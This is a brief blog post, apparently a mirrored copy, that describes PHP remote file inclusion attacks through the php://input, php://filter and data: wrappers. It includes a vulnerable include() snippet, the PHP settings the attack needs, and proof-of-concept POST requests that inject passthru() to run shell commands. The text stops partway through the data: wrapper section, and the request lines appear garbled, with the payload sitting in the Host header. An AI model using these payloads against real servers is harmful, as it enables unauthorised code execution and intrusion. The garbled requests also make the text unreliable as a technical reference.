Showing posts from March, 2011

Self Contained RFI in PHP

This is a direct rip from here : It is for my own record, and can be seen as a mirror. :) Sometimes those two tricks may be useful in RFI attacks. 1. Using php://input wrapper php://input wrapper allows you to read raw POST data ( For example, there is such code: sini2 <? if ( include($_GET['file'] . '.php') ) { echo 'Henck!'; } else { echo 'Error!'; } ?> For exploitation we need: allow_url_include=On magic_quotes_gpc=Off PoC: POST HTTP/1.1 Host: <?php passthru('dir'); ?> Also using additional php://filter wrapper (available since PHP 5.0.0) we can encode our php code: POST HTTP/1.1 Host: <?php passthru('dir'); ?> 2. Using data: wrapper Since version 5.2.0 PHP support